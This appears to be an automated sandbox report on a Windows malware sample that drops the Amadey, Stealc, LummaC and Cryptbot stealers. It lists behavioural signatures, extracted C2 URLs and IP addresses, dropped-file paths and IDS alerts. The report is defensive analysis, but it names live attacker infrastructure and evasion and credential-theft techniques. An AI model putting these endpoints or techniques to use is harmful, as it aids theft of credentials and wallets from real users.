Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561857
MD5: 1720b52474ed20de02ae925ba32024b7
SHA1: 47b050f6af2e0382ce2efc05d31a76f4e007d1eb
SHA256: 36390b8dbc533edd9af51b7960bba7c5ba5ffe23b52e025733c2267f21ed07ff
Tags: exeuser-Bitsight
Infos:

Detection

Amadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Clipboard Hijacker
Yara detected Credential Flusher
Yara detected Cryptbot
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Drops large PE files
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.206/68b591d6548ec281/sqlite3.dlly_ Avira URL Cloud: Label: malware
Source: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW17320193476963 Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/7 Avira URL Cloud: Label: malware
Source: CgPhome.fvtekk5pn.top Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000006.00000003.2313546363.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 00000021.00000002.3320048411.000000000117B000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: e5e907fecb.exe.5012.15.memstrmin Malware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs:443/api", "Build Version": "LOGS11--LiveTraffi"}
Source: a7f098a093.exe.6104.12.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["home.fvtekk5pn.top", "CgPhome.fvtekk5pn.top"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\r5mqFEC[1].exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\service123.exe ReversingLabs: Detection: 45%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\r5mqFEC[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Source: a7f098a093.exe, 0000000C.00000003.2547058326.0000000007052000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_4e499482-e
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.10.6:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.6:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.6:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.6:443 -> 192.168.2.4:49793 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.6:443 -> 192.168.2.4:49801 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.6:443 -> 192.168.2.4:49812 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.6:443 -> 192.168.2.4:49819 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.6:443 -> 192.168.2.4:49833 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49834 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49870 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49876 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49893 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49908 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49926 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49938 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49950 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49980 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50004 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50014 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50022 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50031 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50037 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50044 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50052 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50065 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50259 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50261 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50263 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50266 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50269 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50270 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50273 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50274 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50275 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50277 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50278 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50281 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50300 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50311 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50318 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50321 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: e5e907fecb.exe, 0000000F.00000002.3301652405.0000000005C62000.00000040.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.3201877381.0000000008050000.00000004.00001000.00020000.00000000.sdmp, 19cf1f0449.exe, 00000024.00000002.3049262928.0000000000D02000.00000040.00000001.01000000.00000015.sdmp, 19cf1f0449.exe, 00000024.00000003.2914185780.0000000005020000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007D17FB FindFirstFileExW,FindNextFileW,FindClose,FindClose, 7_2_007D17FB
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 9_2_007D174A FindFirstFileExW, 9_2_007D174A
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 9_2_007D17FB FindFirstFileExW,FindNextFileW,FindClose,FindClose, 9_2_007D17FB
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then movzx eax, byte ptr [esp+esi+000001E8h] 10_2_0040E0D8
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then mov edx, eax 10_2_0043B8E0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then mov edx, ecx 10_2_0043B8E0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+14h] 10_2_004098F0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then movzx esi, byte ptr [esp+eax-65h] 10_2_0040E35B
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then mov byte ptr [eax], bl 10_2_0040CF05
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh 10_2_0043C040
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], C18BC4BAh 10_2_0043C040
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], 6DBC3610h 10_2_0043C040
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh 10_2_0043C040
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then push eax 10_2_0043B860
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then mov byte ptr [ebx], al 10_2_00420870
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then mov ecx, eax 10_2_0040C02B
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then push eax 10_2_0043F8D0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then mov edi, eax 10_2_0043F8D0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then cmp dword ptr [ebx+edi*8], 4C697C35h 10_2_0043BCE0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then mov eax, ebp 10_2_00405C90
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then mov eax, ebp 10_2_00405C90
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then mov edx, ecx 10_2_0040BC9D
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then mov byte ptr [esi], cl 10_2_00428CB0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then movzx edi, byte ptr [esp+edx+14h] 10_2_0040E970
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then movzx edx, byte ptr [eax+ecx] 10_2_0040AD00
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then mov word ptr [esi], cx 10_2_0040EA38
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then movzx edx, byte ptr [edi] 10_2_00425E90
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax-58FA0F6Ch] 10_2_00440F60
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then movzx edx, byte ptr [eax+ecx+00008F12h] 10_2_004077D0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 4x nop then mov word ptr [ebp+ebx*4+00h], ax 10_2_004077D0
Source: chrome.exe Memory has grown: Private usage: 1MB later: 28MB
Source: firefox.exe Memory has grown: Private usage: 1MB later: 177MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49774 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49759
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49748 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49807 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49832 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49857 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49855 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49855 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49855
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49855 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49855
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49855 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49877 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49921 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:50051 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50073 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50112 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50260 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50276 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50264 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50265 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50257
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50271 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50286 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:50323 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50363 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50434
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50441 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49793 -> 104.21.10.6:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49770 -> 104.21.10.6:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49770 -> 104.21.10.6:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49834 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49834 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49876 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49777 -> 104.21.10.6:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49777 -> 104.21.10.6:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49980 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49893 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49870 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49876 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49833 -> 104.21.10.6:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50004 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50004 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49870 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50014 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50014 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50022 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50065 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50052 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50259 -> 104.21.33.116:443
